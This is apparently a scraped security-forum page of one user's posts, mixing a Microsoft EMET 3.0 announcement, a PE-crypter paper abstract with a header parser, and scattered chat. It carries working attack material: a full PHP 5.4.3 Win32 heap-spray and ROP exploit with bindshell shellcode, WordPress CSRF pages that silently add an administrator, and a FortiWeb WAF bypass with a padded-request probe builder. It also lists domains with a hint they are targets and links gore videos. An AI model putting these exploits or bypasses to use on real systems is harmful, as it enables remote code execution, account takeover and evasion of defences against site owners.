Everything posted by Nytro
-
Enhanced Mitigation Experience Toolkit (EMET) - EMET 3.0
Nytro posted a topic in Programe securitate
Enhanced Mitigation Experience Toolkit (EMET) - EMET 3.0.

[h=3]Introducing EMET v3[/h]

swiat, 15 May 2012 11:00 AM

We are pleased to announce the release of a new version of our Enhanced Mitigation Experience Toolkit (EMET) - EMET 3.0. EMET is a free utility that helps prevent vulnerabilities in software from being successfully exploited for code execution. It does so by opting software in to the latest security mitigation technologies. The result is that a wide variety of software is made significantly more resistant to exploitation, even against zero-day vulnerabilities and vulnerabilities for which an update has not yet been applied.

Download it here: EMET - Microsoft Download Center - Download Details

This new version of the tool being released today addresses the top feedback theme we have heard from users: EMET needs more enterprise configuration, deployment and reporting options. We have seen growing interest in adoption from enterprise and large-scale networks, and this new version includes enhancements for that segment. Here are some of the highlights of and new features in EMET 3.0:

- Making configuration easy
- Enterprise deployment via Group Policy and SCCM
- Reporting capability via the new EMET Notifier feature

Configuration

EMET 3.0 comes with three default "Protection Profiles". Protection Profiles are XML files that contain pre-configured EMET settings for common Microsoft and third-party applications. Under EMET's installation directory, these files are in the Deployment\Protection Profiles folder. You can enable them as-is, modify them, or create new protection profiles based on them. The three profiles that ship with EMET 3.0 are:

- Internet Explorer.xml: Enables mitigations for supported versions of Microsoft Internet Explorer.
- Office Software.xml: Enables mitigations for supported versions of Microsoft Internet Explorer, applications that are part of the Microsoft Office suite, Adobe Acrobat 8-10 and Adobe Acrobat Reader 8-10.
- All.xml: Enables mitigations for common home and enterprise applications, including Microsoft Internet Explorer and Microsoft Office.

Looking inside a profile, we see a list of programs with EMET mitigations. The example below shows all EMET mitigations enabled for Windows Media Player, with the exception of Mandatory ASLR:

<Product Name="Windows Media player">
    <Version Path="*\Windows Media Player\wmplayer.exe">
        <Mitigation Enabled="false" Name="MandatoryASLR"/>
    </Version>
</Product>

Notice the "*" in the Path attribute above? In EMET 3.0 we also expanded the EMET grammar rules. Existing rules that you might have continue to work as-is, and it is now also possible to use wildcards in EMET rules. This means that you no longer have to use the full path of an application in EMET rules. You can use the "*" character or simply use the image name, such as "iexplore.exe", in your rules. EMET will protect them regardless of where these applications may be installed. This has been one of the most requested features.

Deployment

EMET also comes with built-in support for enterprise deployment and configuration technologies. This enables administrators to use Group Policy or System Center Configuration Manager to deploy, configure and monitor EMET installations across the enterprise environment.

For Group Policy: EMET includes an ADMX file that contains the three protection profiles mentioned above as policies that can be enabled/disabled through Group Policy. There is also a policy that demonstrates how to add custom EMET settings.

For System Center Configuration Manager: the SCCM team blog post this morning provides a package and instructions for integration with various SCCM features.

Reporting

With EMET 3.0, we have included an additional new reporting capability that we call "EMET Notifier". When you install EMET 3.0, this lightweight component is set to automatically start with Windows. It will show up in the notification area of your taskbar with an EMET 3.0 icon. EMET Notifier has two duties:

- Write events out to the Windows Event Log
- Show important events via a tooltip in the taskbar notification area

EMET events are logged via the event source called EMET. These logs can be found in the Application log. There are three levels: Information, Warning and Error. Information messages are used for logging usual operation, such as the EMET Notifier starting. Warning messages are used when EMET settings change. Error messages are used for logging cases where EMET stopped an application with one of its mitigations, which means an active attack has been blocked. An example entry can be seen below.

In addition to the error messages written to the Windows Event Log, when an EMET mitigation stops (crashes) an application by blocking an exploit, a message is displayed for the user. A toast-style taskbar notification states which application is being stopped and which mitigation is causing EMET to stop it. You can see an example below.

Other EMET v3 developments

In addition to these features, EMET 3.0 comes with a number of other improvements and bug fixes. More details and a FAQ can be found in the User Guide that comes with the install. However, we would like to specifically highlight a couple of things here.

First, we have tested EMET 3.0 on the Windows 8 Consumer Preview and it works great; we encountered no problems at all, so we encourage you to use EMET on all versions of Windows.

Second, EMET 3.0 can be installed just fine on a system where EMET 2.1 (the previous release) was already installed. An upgrade or a new installation is no different. Your existing rules built for EMET 2.1 will continue to work just fine with EMET 3.0.

Third, we would like to point out that EMET is an officially supported Microsoft tool. That is a question we get a lot from enterprise customers. Microsoft's Customer Service & Support team offers forum-based support via the Enhanced Mitigation Experience Toolkit (EMET) Support Forum. We in MSRC Engineering are also very eager to promote EMET and help you use it, so we are quick to respond to feedback, ideas, suggestions or questions via switech -at- microsoft -dot- com. Please do not hesitate to reach out to us.

Acknowledgements

I would like to thank Chengyun Chu, Elias Bachaalany, Elia Florio, Jinwook Shin, Neil Sikka and Nitin Kumar Goel for their various contributions to this release. Also a big thank you to Jason Githens and Hema Rajalakshmi from the System Center Configuration Manager team for their help and support.

- Suha Can, MSRC Engineering (EMET 3.0 release owner)

Source: Introducing EMET v3 - Security Research & Defense - Site Home - TechNet Blogs
-
Yes, so it's junk: if you're sniffing anyway you grab the cookie/session; I don't think login is done based on IP or whatever.
-
Hyperion: Implementation of a PE-Crypter
Christian Ammann
May 8, 2012

1 Introduction

A runtime crypter accepts binary executable files as input and transforms them into an encrypted version (preserving the original behaviour). The encrypted file decrypts itself on startup and executes its original content. This approach allows the deployment of malicious executables in protected environments: a pattern-based anti-virus (AV) solution detects the signature of suspicious files and blocks their execution. The encrypted counterpart contains an unknown signature, its content cannot be analysed by heuristics and it is therefore executed normally, without intervention by the AV scanner. Other uses are the protection of binaries against reversing, or the replacement of the encryption routine with a packer to reduce the size of an executable.

This paper reveals the theoretical aspects behind runtime crypters and describes a reference implementation for Portable Executables (PE) [1], which is the Windows file format for dynamic-link libraries (DLLs), object files and regular executables. The encryption of Windows executables requires a general understanding of the following aspects:

- PE layout: the PE header, section headers and data directory entries.
- PE loader: how and where process images are loaded and executed in virtual memory.

We give a beginner-friendly introduction to these two important topics in section 2. Afterwards, in section 3, we present and explain the PE crypter reference implementation Hyperion for 32-bit executables, which can be divided into two parts (see figure 1 for details): a crypter and a container. The crypter (explained in more detail in section 3.1) takes a PE binary as input, copies the complete input file into memory, calculates a checksum and prepends the checksum to the input file. Afterwards, a random key is generated which is used to encrypt the checksum and the input file with the AES-128 [2] encryption algorithm. Finally, the encrypted result is copied into the container's data section.

Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf
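As an added illustration of the PE layout the paper says a crypter has to understand (this is example code written for this post, not Hyperion's code and not from the paper): a minimal PE32 header parser that pulls the entry point, image base and section table out of an image, maps an RVA back to a file offset, and runs against a constructed, non-executable sample image built inline. Field offsets follow the PE/COFF specification; the sample image's section names, sizes and addresses are made up for the demonstration.

```python
import struct

# Layout constants from the PE/COFF specification (PE32, i.e. 32-bit images).
DOS_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\0\0"
PE32_MAGIC = 0x10B
# name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics
SECTION_HEADER_FMT = "<8sIIIIIIHHI"
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)  # 40 bytes


def parse_pe(data):
    """Parse the headers a crypter needs: entry point, image base and the section table."""
    if data[:2] != DOS_MAGIC:
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]        # offset of the NT headers
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                        # COFF file header (20 bytes)
    machine, num_sections = struct.unpack_from("<HH", data, coff)
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                                            # optional header
    if struct.unpack_from("<H", data, opt)[0] != PE32_MAGIC:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]    # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", data, opt + 28)[0]   # ImageBase
    section_align, file_align = struct.unpack_from("<II", data, opt + 32)
    table = opt + size_of_optional                             # section table follows the optional header
    sections = []
    for i in range(num_sections):
        f = struct.unpack_from(SECTION_HEADER_FMT, data, table + i * SECTION_HEADER_SIZE)
        sections.append({
            "name": f[0].rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": f[1], "virtual_address": f[2],
            "raw_size": f[3], "raw_offset": f[4], "characteristics": f[9],
        })
    return {"machine": machine, "entry_rva": entry_rva, "image_base": image_base,
            "section_alignment": section_align, "file_alignment": file_align,
            "sections": sections}


def rva_to_offset(pe, rva):
    """Map an RVA (address relative to ImageBase once loaded) to the file offset backing it."""
    for s in pe["sections"]:
        start = s["virtual_address"]
        if start <= rva < start + max(s["virtual_size"], s["raw_size"]):
            return s["raw_offset"] + (rva - start)
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def section_by_name(pe, name):
    """Locate a section header by name, e.g. the .data section a crypter writes its payload into."""
    for s in pe["sections"]:
        if s["name"] == name:
            return s
    raise KeyError(name)


def build_sample_pe():
    """Constructed minimal PE32 image (not a real program): .text at RVA 0x1000, .data at RVA 0x2000."""
    e_lfanew = 0x40
    dos = DOS_MAGIC + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)  # i386, 2 sections, 32-bit EXE
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      PE32_MAGIC, 0, 0,
                      0x200, 0x200, 0, 0x1000, 0x1000, 0x2000, 0x400000, 0x1000, 0x200,
                      4, 0, 0, 0, 4, 0,
                      0, 0x3000, 0x200, 0,
                      2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"\0" * (16 * 8)  # 16 empty data directory entries
    text = struct.pack(SECTION_HEADER_FMT, b".text", 0x10, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    data = struct.pack(SECTION_HEADER_FMT, b".data", 0x100, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    headers = dos + PE_SIGNATURE + coff + opt + text + data
    headers += b"\0" * (0x200 - len(headers))                  # pad headers to FileAlignment
    return headers + b"\xC3" * 0x200 + b"\0" * 0x200           # .text filled with RET, .data empty
```

rva_to_offset is the mapping a crypter needs in both directions: when reading the input it turns the entry point RVA into the bytes to encrypt, and when writing the container it turns the .data section's RVA into the file offset where the encrypted blob and checksum go. Real images add relocations, imports and multiple alignments on top of this, which is what section 2 of the paper covers.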
-
[h=1]PHP 5.4 (5.4.3) Code Execution (Win32)[/h]

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)

=================== offset-brute.html ===================

<html><body>
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
<textarea rows=50 cols=50 id="log"></textarea>
</center>
<script>
// Busy-wait so each offset request gets a chance to land before the next one is sent
function sleep(milliseconds) {
    var start = new Date().getTime();
    for (var i = 0; i < 1e7; i++) {
        if ((new Date().getTime() - start) > milliseconds) {
            break;
        }
    }
}

function makeRequest(url, parameters) {
    var xmlhttp = false;
    if (window.XMLHttpRequest) {
        xmlhttp = new XMLHttpRequest();
        if (xmlhttp.overrideMimeType) {
            xmlhttp.overrideMimeType('text/xml');
        }
    } else if (window.ActiveXObject) { // IE
        try {
            xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
        } catch (e) {
            try {
                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (e) {}
        }
    }
    if (!xmlhttp) {
        alert('Giving up Cannot create an XMLHTTP instance');
        return false;
    }
    xmlhttp.open("GET", url, true);
    xmlhttp.send(null);
    return true;
}

// Walk the spray offset until the faked vtable lines up with the sprayed block
test = document.getElementById("log");
for (offset = 0; offset < 300; offset++) {
    log.value += "Trying offset:" + offset + "\r\n";
    makeRequest("0day.php?offset=" + offset);
    sleep(500);
}
</script></body></html>

=================== 0day.php ===================

<?php
$spray = str_repeat("\x90", 0x200);
$offset = $_GET['offset'];

// 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll]
$spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1, (strlen($spray))*-1);
// :> 0x048d0030
$spray = substr_replace($spray, pack("L", 0x048d0030+$offset), (strlen($spray)-0x8)*-1, (strlen($spray))*-1);
//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll]
$spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1, (strlen($spray))*-1);
// Address of VirtualProtect 0x7c801ad4
$spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1, (strlen($spray))*-1);
// LPVOID lpAddress = 0x048d0060
$spray = substr_replace($spray, pack("L", 0x048d0060+$offset), (strlen($spray)-0x1c)*-1, (strlen($spray))*-1);
// SIZE_T dwSize = 0x01000000
$spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1, (strlen($spray))*-1);
// DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0
$spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1, (strlen($spray))*-1);
// __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000 // 0x048d0068
$spray = substr_replace($spray, pack("L", 0x048d0068+$offset), (strlen($spray)-0x28)*-1, (strlen($spray))*-1);
//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll]
$spray = substr_replace($spray, "\xb4\xe8\xdf\x77", (strlen($spray)-0x18)*-1, 4);
// Ret Address = 0x048d0080
$spray = substr_replace($spray, pack("L", 0x048d0080+$offset), (strlen($spray)-0x48)*-1, 4);

$stacktrack = "\xbc\x0c\xb0\xc0\x00";

// Universal win32 bindshell on port 1337 from metasploit
$shellcode = $stacktrack."\x33\xc9\x83\xe9\xb0".
"\x81\xc4\xd0\xfd\xff\xff".
"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
"\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
"\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
"\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
"\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
"\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
"\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
"\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
"\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
"\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
"\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
"\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
"\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
"\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
"\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
"\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
"\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
"\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
"\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
"\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
"\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
"\x4e\x33\xe4\x96\xcd\xcc\x32\x69";

$spray = substr_replace($spray, $shellcode, (strlen($spray)-0x50)*-1, (strlen($shellcode)));

// Fill the heap with copies of the 0x200-byte block (NOP sled + ROP frame + shellcode)
$fullspray = "";
for ($i = 0; $i < 0x4b00; $i++) {
    $fullspray .= $spray;
}

$j = array(); $e = array(); $b = array(); $a = array(); $c = array();
array_push($j, $fullspray);
array_push($e, $fullspray."W");
array_push($b, $fullspray."A");
array_push($a, $fullspray."S");
array_push($c, $fullspray."!");

// Pointer into the sprayed region, interpreted by the COM extension as a VARIANT
$vVar = new VARIANT(0x048d0038+$offset);
// Shoot him
com_print_typeinfo($vVar);
//CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10]

echo $arr;
echo $spray;
?>

Source: PHP 5.4 (5.4.3) Code Execution (Win32)
-
OK, when I get home tonight, tell me on Messenger so I don't forget.
-
It's probably not for you.
-
User unu_1234567 has had his V.I.P. rank removed because he took advantage of it to gain trust. He will not receive a ban, under any circumstances, because of his contributions; the old-timers will understand. We hope it will not happen again. It remains up to you to decide the moral "winner" of the dispute and whether you will get involved in trades with them, but keep in mind that both are people who deserve respect, even though many of you probably know nothing about them.
-
They're not fake, young man; in Africa women are still burned at the stake for witchcraft, reality is harsh. In Tibet, nuns set themselves on fire: Self Immolation Video of Buddhist Nun Palden Choetso in Tibet | Best Gore; Self Immolation of a Nun in Tibet | Best Gore. Then, in the middle of "civilisation": http://www.bestgore.com/execution/african-man-lynched-burned-alive-gay-necklacing-failed/
-
GET and POST requests using the RollingCurl library
Nytro replied to konkhra's topic in Programare
Pff, I don't like how the library is built; I don't think the example at http://rolling-curl.googlecode.com/svn/trunk/example_groups.php helps you. Use plain curl, with curl_multi_exec.
-
Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow
Nytro replied to The_Arhitect's topic in Exploituri
Photoshop CS5 (12.04, I think) crashes, but the shellcode doesn't execute. Does anyone have CS5.1 to try it?
-
1. casadinpitesti.ro
2. smartprices.info
3. www.activineuropa.ro
4. www.originalhandmade.ro
5. activineuropa.ro
6. www.ice-tropez.ro
7. www.novelresearch.ro
8. www.perlamamaia.ro
9. daune-auto.com
10. www.daune-auto.com
11. www.enovate.ro
12. www.casa-agave.ro
13. www.uniromexim.ro

Friends know why.
-
They're both good guys (from other points of view); we'll see tonight what's to be done.
-
PHP-CGI Exploitation by Example - SpiderLabs
-
[h=1]Download BitDefender Total Security 2013 Beta – Testing has begun[/h]

By Radu FaraVirusi(com) on May 7, 2012

BitDefender announces the launch of BitDefender Total Security 2013 Beta, which can be evaluated free of charge for 60 days. What's new?

- Device Anti-Theft
- USB Immunizer
- Windows Widget
- improvements to Parental Control, BitDefender SafeBox and the MyBitDefender Dashboard

To download BitDefender Total Security 2013 Beta, go to: Bitdefender Total Security 2013 BETA

Source: Descarca BitDefender Total Security 2013 Beta – Testarea a inceput
-
[h=1]Fortinet FortiWeb Web Application Firewall Policy Bypass[/h]

BINAR10 Report on Fortinet FortiWeb Findings
02/05/2012 - Fortinet FortiWeb Web Application Firewall Policy Bypass
============================================================

1) Affected Product
Vendor: Fortinet
Product name: FortiWeb
Version: Latest update as of Tue, 2 May 2012
Type: Web Application Firewall
Product URL: http://www.fortinet.com/products/fortiweb/index.html

2) Description of the Findings
BINAR10 has found a policy bypass that occurs when large amounts of data are sent in a POST body or in a GET request.

3) Technical Details

3.1. POST Request Example
When padding data exceeding 2399 bytes is appended to a POST request, the WAF does not inspect the data sent and the request hits the application directly. This should occur when the product is not configured to block malformed requests, but that feature also checks the POST size limit and blocks the request if it exceeds a fixed limit, so it is likely to have been disabled because of application requirements in medium-sized forms. The response is also not verified by the WAF, and information disclosure occurs with details of the infrastructure. This bypass could be used to inject different types of vectors; as shown in the example, all that is needed is to append a new variable at the end of the POST data, filled with arbitrary data that exceeds 2399 bytes.

---POST example
POST /<path>/login-app.aspx HTTP/1.1
Host: <host>
User-Agent: <any valid user agent string>
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: <the content length must be at least 2399 bytes>

var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes>

3.2. GET Requests
The same issue as with POST requests, but it can be triggered by sending arbitrary data at the end of the URL.

--GET example
http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>

4. Validation Required
It requires validation by other researchers who have access to the product.

5. Time Table
04/27/2012 - Vendor notified.
04/27/2012 - Vendor response, requiring some tests.
05/02/2012 - Vendor indicates that this is a configuration problem and not a product vulnerability.

6. Credits
Geffrey Velasquez <geffrey at gmail.com> at BINAR10 S.A.C.

Source: Fortinet FortiWeb Web Application Firewall Policy Bypass
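Added example, not from the BINAR10 report: request builders that reproduce the two templates above, computing the padding so that the encoded POST body or query string crosses the 2399-byte figure from the report, together with a baseline request carrying the same fields and no padding, so the two responses can be compared to confirm the behaviour on a given deployment. The field names, the `pad` parameter and the 2399 threshold are taken from the report; the placeholder host and path, the filler byte, the User-Agent and the raw-socket sender are my own choices.

```python
from urllib.parse import urlencode

THRESHOLD = 2399  # size figure from the report: bytes of encoded body or query string


def pad_query(fields, threshold=THRESHOLD, pad_name="pad"):
    """URL-encode fields, then append pad_name=AAA... until the encoded string is threshold+1 bytes."""
    prefix = urlencode(fields) + "&" + pad_name + "="
    return prefix + "A" * max(threshold + 1 - len(prefix), 0)


def raw_post(host, path, body, user_agent="Mozilla/5.0"):
    """Raw HTTP/1.1 POST following the report's template, with a correct Content-Length."""
    head = ("POST %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\nConnection: close\r\n\r\n"
            % (path, host, user_agent, len(body)))
    return head.encode("ascii") + body


def raw_get(host, path, query, user_agent="Mozilla/5.0"):
    """Raw HTTP/1.1 GET with the (possibly padded) query string in the request line."""
    return ("GET %s?%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n"
            % (path, query, host, user_agent)).encode("ascii")


def probe_pair(host, path, fields, method="POST", threshold=THRESHOLD):
    """Return (baseline, padded): same fields, the second with the pad appended.
    A WAF that blocks the first and passes the second shows the behaviour reported."""
    plain = urlencode(fields)
    padded = pad_query(fields, threshold)
    if method == "POST":
        return raw_post(host, path, plain.encode("ascii")), raw_post(host, path, padded.encode("ascii"))
    return raw_get(host, path, plain), raw_get(host, path, padded)


def split_request(request):
    """Split a raw request into (header bytes, body bytes) for inspection."""
    head, _, body = request.partition(b"\r\n\r\n")
    return head, body


def send_raw(host, port, request, timeout=10):
    """Send one raw request over a socket and return the full response (network; not run offline)."""
    import socket
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            chunk = s.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    # Constructed field set; the real test would put the probe payload in var1 or var2.
    baseline, padded = probe_pair("waf.example", "/path/login-app.aspx",
                                  {"var1": "datavar1", "var2": "datavar12"})
    print(split_request(baseline)[0].decode())
    print(len(split_request(padded)[1]), "bytes of body in the padded request")
```

Compare status codes and bodies of the two responses rather than just the status: the report notes the response is not inspected either, so a backend error page coming back unfiltered on the padded request is the second indicator to look for.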
-
The Curious Case of Benjamin Button
Sherlock Holmes
Ring of the Nibelungs
The Illusionist
The Librarian
Butterfly Effect
Dark Floors
Room 1408
The Cube
The Eye
Triangle

Not necessarily psychological, but worth watching.
-
I moved it there (from Announcements + warn), I didn't know where else to put it. Calm down.
-
Have you looked here: oberhumer.com: LZO real-time data compression library ?
-
[h=1]Wordpress 3.3.1 Multiple CSRF Vulnerabilities[/h]

+---------------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Wordpress 3.3.1 Multiple CSRF Vulnerabilities
# Date : 19-03-2012
# Author : Ivano Binetti (http://www.ivanobinetti.com)
# Software link : http://wordpress.org/wordpress-3.3.1.zip
# Vendor site : http://wordpress.org
# Version : 3.3.1 (and lower). Probably also version 3.3.2 is affected.
# Tested on : Debian Squeeze (6.0)
# Original Advisory : http://www.webapp-security.com/2012/04/wordpress-3-3-1-multiple-csrf-vulnerabilities/
# CVE : CVE-2012-1936
# OSVDB ID : 81588
# Bugtraq ID : 53280
+---------------------------------------------------------------------------------------------------------------------------------------------------+

Summary
1) Introduction
2) Vulnerabilities Description
   2.1 Multiple CSRF
3) Exploit
   3.1 CSRF (Change Post Title)
   3.2 CSRF (Add Admin)

+---------------------------------------------------------------------------------------------------------------------------------------------------+

1) Introduction

WordPress "is web software you can use to create a beautiful website or blog. We like to say that WordPress is both free and priceless at the same time."

2) Vulnerability Description

2.1 Multiple CSRF

Wordpress 3.3.1 suffers from multiple CSRF vulnerabilities which allow an attacker to change a post title, add administrators/users, delete administrators/users, approve and unapprove comments, delete comments, change the background image, insert a custom header image, change the site title, change the administrator's email, change the Wordpress Address and change the Site Address when an authenticated user/admin browses a specially crafted web page. Other parameters may also be modifiable.

This vulnerability is caused by a security flaw in anti-CSRF token (_wpnonce, _wpnonce_create-user, _ajax_nonce, _wpnonce-custom-background-upload, _wpnonce-custom-header-upload) generation. For some operations (see below) the anti-CSRF tokens specified above are not associated with the current user session (as OWASP recommends) but are valid for all operations (for a specific administrator/user) within 12 hours. The vulnerability described above allows an attacker who has sniffed an anti-CSRF token to have 12 hours in which to perform a CSRF attack.

For the OWASP recommendation on anti-CSRF tokens, you can read the following document:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet#General_Recommendation:_Synchronizer_Token_Pattern

This problem affects the following operations:
- Add Admin/User
- Delete Admin/User
- Approve comment
- Unapprove comment
- Delete comment
- Change background image
- Insert custom header image
- Change site title
- Change administrator's email
- Change Wordpress Address
- Change Site Address

Other operations (like inserting a new post) are not affected by this CSRF vulnerability. In this advisory I will only demonstrate how to change a post title and how to add a new administrator account.

3) Exploit

3.1 CSRF (Change Post Title)

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change post title</H2>
<form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/admin-ajax.php">
<input type="hidden" name="post_title" value="hackedtitle"/>
<input type="hidden" name="post_name" value="hackedtitle"/>
<input type="hidden" name="mm" value="03"/>
<input type="hidden" name="jj" value="16"/>
<input type="hidden" name="aa" value="2012"/>
<input type="hidden" name="hh" value=""/>
<input type="hidden" name="mn" value=""/>
<input type="hidden" name="ss" value=""/>
<input type="hidden" name="post_author" value="1"/>
<input type="hidden" name="post_password" value=""/>
<input type="hidden" name="post_category%5B%5D" value="0"/>
<input type="hidden" name="post_category%5B%5D" value="1"/>
<input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/>
<input type="hidden" name="comment_status" value="open"/>
<input type="hidden" name="ping_status" value="open"/>
<input type="hidden" name="_status" value="publish"/>
<input type="hidden" name="post_format" value="0"/>
<input type="hidden" name="_inline_edit" value="<sniffed_value>"/>
<input type="hidden" name="post_view" value="list"/>
<input type="hidden" name="screen" value="edit-post"/>
<input type="hidden" name="action" value="inline-save"/>
<input type="hidden" name="post_type" value="post"/>
<input type="hidden" name="post_ID" value="1"/>
<input type="hidden" name="edit_date" value="true"/>
<input type="hidden" name="post_status" value="all"/>
</form>
</body>
</html>

Note: this exploit simulates changing the post title using the "Quick Edit" function.

3.2 CSRF (Add Admin)

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to add Administrator</H2>
<form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php">
<input type="hidden" name="action" value="createuser"/>
<input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/>
<input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/>
<input type="hidden" name="user_login" value="admin2"/>
<input type="hidden" name="email" value="admin2@admin.com"/>
<input type="hidden" name="first_name" value="admin2@admin.com"/>
<input type="hidden" name="last_name" value=""/>
<input type="hidden" name="url" value=""/>
<input type="hidden" name="pass1" value="password"/>
<input type="hidden" name="pass2" value="password"/>
<input type="hidden" name="role" value="administrator"/>
<input type="hidden" name="createuser" value="Add+New+User+"/>
</form>
</body>
</html>

+--------------------------------------------------------------------------------------------------------------------------------------------------+

Source: Wordpress 3.3.1 Multiple CSRF Vulnerabilities
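Added example, not part of the advisory and not WordPress code: a simplified model of the two token schemes the advisory contrasts. `weak_nonce` keys the token to a 12-hour time bucket, the action and the user id only, so a token captured once replays from any browser and any later session until the bucket rolls over; `session_token` follows the synchronizer token pattern the advisory links to, binding the token to the session identifier so it stops working as soon as the victim logs out and back in. The secret, timestamps and session ids are constructed values, and the 12-hour bucket is a simplification of the window the advisory describes.

```python
import hashlib
import hmac

NONCE_LIFE = 12 * 3600  # the 12-hour validity window the advisory describes


def weak_nonce(secret, user_id, action, now):
    """Time-bucketed, per-user/per-action token with no link to the login session.
    Simplified model of the scheme the advisory criticises; not WordPress's own code."""
    tick = now // NONCE_LIFE
    msg = ("%d|%s|%d" % (tick, action, user_id)).encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()[:10]


def verify_weak(secret, user_id, action, now, token):
    return hmac.compare_digest(weak_nonce(secret, user_id, action, now), token)


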